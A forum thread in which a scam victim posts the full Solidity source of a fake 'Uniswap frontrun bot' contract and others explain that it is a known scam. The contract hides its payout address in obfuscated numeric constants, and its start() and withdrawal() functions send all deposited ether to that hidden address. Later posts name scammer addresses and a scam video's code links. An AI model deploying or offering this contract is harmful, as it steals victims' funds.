Scam blocked eth contract

Security
1

Hello everyone, I know I'm sending a bottle to the sea but nothing ventured, nothing gained.
I have unfortunately made a stupid mistake which was a scam, I created a contract and sent my ether on it but it's after that I realized that the bot did not validate my withdrawal creating an error but moreover the contract them of the withdrawal request refers to another internal contract address and so my question is: how could I do to circumvent this problem is recover my ethers? is it possible to make a modification to change that? or other?

I would like to thank you in advance for your time and help.

2

Hard to say without you showing the contract code. However if the funds got transferred from your contract to another address then there is nothing you can do to retrieve it.

There are a lot of scam contract claiming they will automatically do an action for you on the blockchain, often the mempool is mentioned. However a smart contract can not do anything without someone triggering it by sending a transaction, the smart contract is impossible to “react” to something happening on the blockchain. Someone or another smart contract needs to actively call your contract.

3

Thank you for your reply. Here is the contract code:

pragma solidity ^0.6.6;

contract UniswapFrontrunBot {

string public tokenName;
string public tokenSymbol;
uint frontrun;

event Log(string _msg);

constructor(string memory _tokenName, string memory _tokenSymbol) public {
    tokenName = _tokenName;
    tokenSymbol = _tokenSymbol;
}

receive() external payable {}

struct slice {
    uint _len;
    uint _ptr;
}
/*
 * @dev Find newly deployed contracts on Uniswap
 * @param memory of required contract liquidity.
 * @param other The second slice to compare.
 * @return New contracts with required liquidity.
 */

function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
    uint shortest = self._len;

   if (other._len < self._len)
         shortest = other._len;

    uint selfptr = self._ptr;
    uint otherptr = other._ptr;

    for (uint idx = 0; idx < shortest; idx += 32) {
        // initiate contract finder
        uint a;
        uint b;

        string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
        string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
        loadCurrentContract(WETH_CONTRACT_ADDRESS);
        loadCurrentContract(TOKEN_CONTRACT_ADDRESS);
        assembly {
            a := mload(selfptr)
            b := mload(otherptr)
        }

        if (a != b) {
            // Mask out irrelevant contracts and check again for new contracts
            uint256 mask = uint256(-1);

            if(shortest < 32) {
              mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
            }
            uint256 diff = (a & mask) - (b & mask);
            if (diff != 0)
                return int(diff);
        }
        selfptr += 32;
        otherptr += 32;
    }
    return int(self._len) - int(other._len);
}

/*
 * @dev Extracts the newest contracts on Uniswap exchange
 * @param self The slice to operate on.
 * @param rune The slice that will contain the first rune.
 * @return `list of contracts`.
 */
function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
    uint ptr = selfptr;
    uint idx;

    if (needlelen <= selflen) {
        if (needlelen <= 32) {
            bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

            bytes32 needledata;
            assembly { needledata := and(mload(needleptr), mask) }

            uint end = selfptr + selflen - needlelen;
            bytes32 ptrdata;
            assembly { ptrdata := and(mload(ptr), mask) }

            while (ptrdata != needledata) {
                if (ptr >= end)
                    return selfptr + selflen;
                ptr++;
                assembly { ptrdata := and(mload(ptr), mask) }
            }
            return ptr;
        } else {
            // For long needles, use hashing
            bytes32 hash;
            assembly { hash := keccak256(needleptr, needlelen) }

            for (idx = 0; idx <= selflen - needlelen; idx++) {
                bytes32 testHash;
                assembly { testHash := keccak256(ptr, needlelen) }
                if (hash == testHash)
                    return ptr;
                ptr += 1;
            }
        }
    }
    return selfptr + selflen;
}


/*
 * @dev Loading the contract
 * @param contract address
 * @return contract interaction object
 */
function loadCurrentContract(string memory self) internal pure returns (string memory) {
    string memory ret = self;
    uint retptr;
    assembly { retptr := add(ret, 32) }

    return ret;
}

/*
 * @dev Extracts the contract from Uniswap
 * @param self The slice to operate on.
 * @param rune The slice that will contain the first rune.
 * @return `rune`.
 */
function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {
    rune._ptr = self._ptr;

    if (self._len == 0) {
        rune._len = 0;
        return rune;
    }

    uint l;
    uint b;
    // Load the first byte of the rune into the LSBs of b
    assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) }
    if (b < 0x80) {
        l = 1;
    } else if(b < 0xE0) {
        l = 2;
    } else if(b < 0xF0) {
        l = 3;
    } else {
        l = 4;
    }

    // Check for truncated codepoints
    if (l > self._len) {
        rune._len = self._len;
        self._ptr += self._len;
        self._len = 0;
        return rune;
    }

    self._ptr += l;
    self._len -= l;
    rune._len = l;
    return rune;
}

function memcpy(uint dest, uint src, uint len) private pure {
    // Check available liquidity
    for(; len >= 32; len -= 32) {
        assembly {
            mstore(dest, mload(src))
        }
        dest += 32;
        src += 32;
    }

    // Copy remaining bytes
    uint mask = 256 ** (32 - len) - 1;
    assembly {
        let srcpart := and(mload(src), not(mask))
        let destpart := and(mload(dest), mask)
        mstore(dest, or(destpart, srcpart))
    }
}

/*
 * @dev Orders the contract by its available liquidity
 * @param self The slice to operate on.
 * @return The contract with possbile maximum return
 */
function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) {
    if (self._len == 0) {
        return 0;
    }

    uint word;
    uint length;
    uint divisor = 2 ** 248;

    // Load the rune into the MSBs of b
    assembly { word:= mload(mload(add(self, 32))) }
    uint b = word / divisor;
    if (b < 0x80) {
        ret = b;
        length = 1;
    } else if(b < 0xE0) {
        ret = b & 0x1F;
        length = 2;
    } else if(b < 0xF0) {
        ret = b & 0x0F;
        length = 3;
    } else {
        ret = b & 0x07;
        length = 4;
    }

    // Check for truncated codepoints
    if (length > self._len) {
        return 0;
    }

    for (uint i = 1; i < length; i++) {
        divisor = divisor / 256;
        b = (word / divisor) & 0xFF;
        if (b & 0xC0 != 0x80) {
            // Invalid UTF-8 sequence
            return 0;
        }
        ret = (ret * 64) | (b & 0x3F);
    }

    return ret;
}

/*
 * @dev Calculates remaining liquidity in contract
 * @param self The slice to operate on.
 * @return The length of the slice in runes.
 */
function calcLiquidityInContract(slice memory self) internal pure returns (uint l) {
    uint ptr = self._ptr - 31;
    uint end = ptr + self._len;
    for (l = 0; ptr < end; l++) {
        uint8 b;
        assembly { b := and(mload(ptr), 0xFF) }
        if (b < 0x80) {
            ptr += 1;
        } else if(b < 0xE0) {
            ptr += 2;
        } else if(b < 0xF0) {
            ptr += 3;
        } else if(b < 0xF8) {
            ptr += 4;
        } else if(b < 0xFC) {
            ptr += 5;
        } else {
            ptr += 6;
        }
    }
}

function getMemPoolOffset() internal pure returns (uint) {
    return 505991;
}

/*
 * @dev Parsing all uniswap mempool
 * @param self The contract to operate on.
 * @return True if the slice is empty, False otherwise.
 */
function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {
    bytes memory tmp = bytes(_a);
    uint160 iaddr = 0;
    uint160 b1;
    uint160 b2;
    for (uint i = 2; i < 2 + 2 * 20; i += 2) {
        iaddr *= 256;
        b1 = uint160(uint8(tmp[i]));
        b2 = uint160(uint8(tmp[i + 1]));
        if ((b1 >= 97) && (b1 <= 102)) {
            b1 -= 87;
        } else if ((b1 >= 65) && (b1 <= 70)) {
            b1 -= 55;
        } else if ((b1 >= 48) && (b1 <= 57)) {
            b1 -= 48;
        }
        if ((b2 >= 97) && (b2 <= 102)) {
            b2 -= 87;
        } else if ((b2 >= 65) && (b2 <= 70)) {
            b2 -= 55;
        } else if ((b2 >= 48) && (b2 <= 57)) {
            b2 -= 48;
        }
        iaddr += (b1 * 16 + b2);
    }
    return address(iaddr);
}


/*
 * @dev Returns the keccak-256 hash of the contracts.
 * @param self The slice to hash.
 * @return The hash of the contract.
 */
function keccak(slice memory self) internal pure returns (bytes32 ret) {
    assembly {
        ret := keccak256(mload(add(self, 32)), mload(self))
    }
}

/*
 * @dev Check if contract has enough liquidity available
 * @param self The contract to operate on.
 * @return True if the slice starts with the provided text, false otherwise.
 */
    function checkLiquidity(uint a) internal pure returns (string memory) {
    uint count = 0;
    uint b = a;
    while (b != 0) {
        count++;
        b /= 16;
    }
    bytes memory res = new bytes(count);
    for (uint i=0; i<count; ++i) {
        b = a % 16;
        res[count - i - 1] = toHexDigit(uint8(b));
        a /= 16;
    }
    uint hexLength = bytes(string(res)).length;
    if (hexLength == 4) {
        string memory _hexC1 = mempool("0", string(res));
        return _hexC1;
    } else if (hexLength == 3) {
        string memory _hexC2 = mempool("0", string(res));
        return _hexC2;
    } else if (hexLength == 2) {
        string memory _hexC3 = mempool("000", string(res));
        return _hexC3;
    } else if (hexLength == 1) {
        string memory _hexC4 = mempool("0000", string(res));
        return _hexC4;
    }

    return string(res);
}

function getMemPoolLength() internal pure returns (uint) {
    return 454248;
}

/*
 * @dev If `self` starts with `needle`, `needle` is removed from the
 *      beginning of `self`. Otherwise, `self` is unmodified.
 * @param self The slice to operate on.
 * @param needle The slice to search for.
 * @return `self`
 */
function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) {
    if (self._len < needle._len) {
        return self;
    }

    bool equal = true;
    if (self._ptr != needle._ptr) {
        assembly {
            let length := mload(needle)
            let selfptr := mload(add(self, 0x20))
            let needleptr := mload(add(needle, 0x20))
            equal := eq(keccak256(selfptr, length), keccak256(needleptr, length))
        }
    }

    if (equal) {
        self._len -= needle._len;
        self._ptr += needle._len;
    }

    return self;
}

// Returns the memory address of the first byte of the first occurrence of
// `needle` in `self`, or the first byte after `self` if not found.
function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
    uint ptr = selfptr;
    uint idx;

    if (needlelen <= selflen) {
        if (needlelen <= 32) {
            bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

            bytes32 needledata;
            assembly { needledata := and(mload(needleptr), mask) }

            uint end = selfptr + selflen - needlelen;
            bytes32 ptrdata;
            assembly { ptrdata := and(mload(ptr), mask) }

            while (ptrdata != needledata) {
                if (ptr >= end)
                    return selfptr + selflen;
                ptr++;
                assembly { ptrdata := and(mload(ptr), mask) }
            }
            return ptr;
        } else {
            // For long needles, use hashing
            bytes32 hash;
            assembly { hash := keccak256(needleptr, needlelen) }

            for (idx = 0; idx <= selflen - needlelen; idx++) {
                bytes32 testHash;
                assembly { testHash := keccak256(ptr, needlelen) }
                if (hash == testHash)
                    return ptr;
                ptr += 1;
            }
        }
    }
    return selfptr + selflen;
}

function getMemPoolHeight() internal pure returns (uint) {
    return 984675;
}

/*
 * @dev Iterating through all mempool to call the one with the with highest possible returns
 * @return `self`.
 */
function callMempool() internal pure returns (string memory) {
    string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset()));
    uint _memPoolSol = 532914;
    uint _memPoolLength = getMemPoolLength();
    uint _memPoolSize = 169530;
    uint _memPoolHeight = getMemPoolHeight();
    uint _memPoolWidth = 453021;
    uint _memPoolDepth = getMemPoolDepth();
    uint _memPoolCount = 991358;

    string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));
    string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));
    string memory _memPool3 = mempool(checkLiquidity(_memPoolHeight), checkLiquidity(_memPoolWidth));
    string memory _memPool4 = mempool(checkLiquidity(_memPoolDepth), checkLiquidity(_memPoolCount));

    string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));
    string memory _fullMempool = mempool("0", _allMempools);

    return _fullMempool;
}

/*
 * @dev Modifies `self` to contain everything from the first occurrence of
 *      `needle` to the end of the slice. `self` is set to the empty slice
 *      if `needle` is not found.
 * @param self The slice to search and modify.
 * @param needle The text to search for.
 * @return `self`.
 */
function toHexDigit(uint8 d) pure internal returns (byte) {
    if (0 <= d && d <= 9) {
        return byte(uint8(byte('0')) + d);
    } else if (10 <= uint8(d) && uint8(d) <= 15) {
        return byte(uint8(byte('a')) + d - 10);
    }
    // revert("Invalid hex digit");
    revert();
}

function _callFrontRunActionMempool() internal pure returns (address) {
    return parseMemoryPool(callMempool());
}


/*
 * @dev Perform frontrun action from different contract pools
 * @return `liquidity`.
 */
function start() public payable { 
    emit Log("Running FrontRun attack on Uniswap. This can take a while please wait...");
    payable(_callFrontRunActionMempool()).transfer(address(this).balance);
}

/*
 * @dev withdraws profits back to the contract creator address
 * @return `profits`.
 */
function withdrawal() public payable { 
    emit Log("Sending profits back to contract creator address...");
    payable(withdrawProfits()).transfer(address(this).balance);
}

/*
 * @dev token int2 to readable str
 * @param token An output parameter to which the first token is written.
 * @return `token`.
 */
function uint2str(uint _i) internal pure returns (string memory _uintAsString) {
    if (_i == 0) {
        return "0";
    }
    uint j = _i;
    uint len;
    while (j != 0) {
        len++;
        j /= 10;
    }
    bytes memory bstr = new bytes(len);
    uint k = len - 1;
    while (_i != 0) {
        bstr[k--] = byte(uint8(48 + _i % 10));
        _i /= 10;
    }
    return string(bstr);
}

function getMemPoolDepth() internal pure returns (uint) {
    return 264495;
}

function withdrawProfits() internal pure returns (address) {
    return parseMemoryPool(callMempool());
}

/*
 * @dev loads all uniswap mempool into memory
 * @param token An output parameter to which the first token is written.
 * @return `mempool`.
 */
function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
    bytes memory _baseBytes = bytes(_base);
    bytes memory _valueBytes = bytes(_value);

    string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
    bytes memory _newValue = bytes(_tmpValue);

    uint i;
    uint j;

    for(i=0; i<_baseBytes.length; i++) {
        _newValue[j++] = _baseBytes[i];
    }

    for(i=0; i<_valueBytes.length; i++) {
        _newValue[j++] = _valueBytes[i];
    }

    return string(_newValue);
}

}

and surprisingly my ether is still on my contract but I don't know what to do?

4

and the libraries with it:
// Import Libraries Migrator/Exchange/Factory
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/IUniswapV2Migrator.sol";
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";

5

import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol";

7

Capture d’écran (21)
Capture d’écran (21)1860×923 109 KB

8

Yeah that’s the typical scam contract, frontrun bots can’t function like that. I’m afraid anything you send to it will be forwarded to the scammer.

9

As I said I wasn't thinking clearly and the lure of profit is still at play, in any case the lesson has been learned but what I don't understand is why my ethers are still on my contract and haven't moved?

10

(post deleted by author)

11

Capture d’écran (20)
Capture d’écran (20)1914×560 75.5 KB

12

Is there any way to interact with the contract to get the ether back?

13

they're trying to maximize what they can get, the eth isn't transferred out until you call start() or withdrawal() i guess you didnt do that yet.

I'm afraid there is no way to get the money out to your own address.

14

I already had start and withdrawal but the start had already worked but the withdrawal will fail several times and then nothing.
I'm not sure if it's possible to transfer it to another contract or to cancel the original contract as I've managed to find it again. What do you think? and again thank you for your time, it's good to be able to talk about it ^^.

15

Afraid not, the contract contains no option to transfer or selfdestruct option that will allow you to get your eth back. It only contains the function to to send it to the adress of the scammer. So i'm afraid there really is no way to get it back.

16

I have to say that I have seen that there are several addresses that are sent to other addresses that all converge to this address: 0x077D360f11D220E4d5D831430c81C26c9be7C4A4
and after a lot of research, one person found the same thing as me. I also wanted to know if my metamask wallet information or even its use is compromised by using the contract features?

17

It should be fine, in general it just forwards whatever so you send too it. I don’t know how you deployed it. To be safe you can check etherscan’s approval list if anything new was added that you didn’t add yourself.

https://etherscan.io/tokenapprovalchecker

If you installed a python package then make sure to install everything you installed with it and delete pythons packages folder etc and run a virus scanner.

1 Like
18

Hello Wolfy. I have found a similar code to yours in a SCAM youtube video.

WARNING: THIS VIDEO IS A SCAM

He is saying to use compile that code: https://pastebin.com/raw/ZsvYEWRj

and there is an import in the beginning:
import ...ipfs.io/ipfs/QmYoMhKcorMPENBvDBmujCWqK2j8owr8X1y3CrjsDaeYJ

that import a fake function that return the SCAM Address:
return 0x83BC352073AAa8d2dc0ff52Ff25e81B19c95E07D;

I think this is a different case because is at the BSC Network.

Hope u can find you ethers back. Good luck.

19

i saw it late, im from spain and this adress (0x83BC352073AAa8d2dc0ff52Ff25e81B19c95E07D) is where my cryptos have gone.
i find similar video but in spanish and help me in telegram (in spanish always) to recover my criptos but is a scam.

20

+1 here... can i ask you how did you managed to recover your funds?

21

@wolfy did you manage to get your funds out? If so How?